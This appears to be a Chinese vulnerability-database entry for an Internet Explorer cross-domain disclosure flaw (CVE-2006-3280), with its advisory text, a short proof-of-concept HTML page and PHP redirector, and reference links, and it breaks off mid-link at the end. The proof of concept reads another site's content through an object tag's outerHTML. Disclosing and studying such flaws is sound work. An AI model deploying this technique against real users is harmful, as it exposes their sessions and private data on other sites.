Microsoft Internet Explorer outerHTML 跨域漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110525 漏洞类型 其他
发布时间 2006-06-27 更新时间 2007-03-29
CVE编号 CVE-2006-3280 CNNVD-ID CNNVD-200606-581
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28118
https://www.securityfocus.com/bid/18682
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-581
|漏洞详情
InternetExplorer是微软发布的非常流行的WEB浏览器。MicrosoftInternetExplorer中存在跨域漏洞。攻击者可以创建特制的对象标签,该标签的数据参数引用了攻击者站点的链接,而这个站点将LocationHTTP首部指定为目标站点,这样就可以通过对象的outerHTML属性读取敏感信息。
|漏洞EXP
source: http://www.securityfocus.com/bid/18682/info

Microsoft Internet Explorer is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain policies.

This issue may allow attackers to access arbitrary websites in the context of a targeted user's browser session. This may allow attackers to perform actions in web applications with the privileges of exploited users or to gain access to potentially sensitive information. This may aid attackers in further attacks.

The following proof of concept is incomplete realization of the idea to demonstrate its feasibility. Windows Server 2003, Enterprise Edition, Service Pack 1, 15/06/2006 Upload the following files to Web server, go to i.html 
------------------------- i.html ------------------------- 
<html>
body onload="setTimeout('alert(o.object.documentElement.outerHTML)',1000)"> 
<object width=100 height=100 data=r.php?http://www.google.com/123456789 type=text/html id=o></object> 
</body>
</html> ------------------------- r.php ------------------------- 
<?php header("Location: ".$_SERVER["QUERY_STRING"]); ?> i.html displays content of Google Web page.
|受影响的产品
Nortel Networks Contact Center - Symposium Agent 0 Nortel Networks Contact Center - Agent Desktop Display 0 Nortel Networks Centrex IP Element Manager 0 Nortel Networks Centrex IP Client Manager
|参考资料

来源:US-CERT
名称:TA06-220A
链接:http://www.us-cert.gov/cas/techalerts/TA06-220A.html
来源:US-CERT
名称:VU#883108
链接:http://www.kb.cert.org/vuls/id/883108
来源:XF
名称:ie-redirection-information-disclosure(27452)
链接:http://xforce.iss.net/xforce/xfdb/27452
来源:BID
名称:18682
链接:http://www.securityfocus.com/bid/18682
来源:BUGTRAQ
名称:20060704Re:BrowserbugshitIE,Firefoxtoday(SANS)
链接:http://www.securityfocus.com/archive/1/archive/1/439146/100/0/threaded
来源:BUGTRAQ
名称:20060630Re:BrowserbugshitIE,Firefoxtoday(SANS)
链接:http://www.securityfocus.com/archive/1/archive/1/438864/100/0/threaded
来源:BUGTRAQ
名称:20060630RE:[Full-disclosure]BrowserbugshitIE,Firefoxtoday(SANS)
链接:http://www.securityfocus.com/archive/1/archive/1/438863/100/0/threaded
来源:BUGTRAQ
名称:20060630ISC:FirefoximmunetoouterHTMLflawinMSIE[Was:BrowserbugshitIE,Firefox]
链接:http://www.securityfocus.com/archive/1/archive/1/438811/100/0/threaded
来源:BUGTRAQ
名称:20060630Re:[Full-disclosure]BrowserbugshitIE,Firefoxtoday(SANS)
链接:http://www.securityfocus.com/ar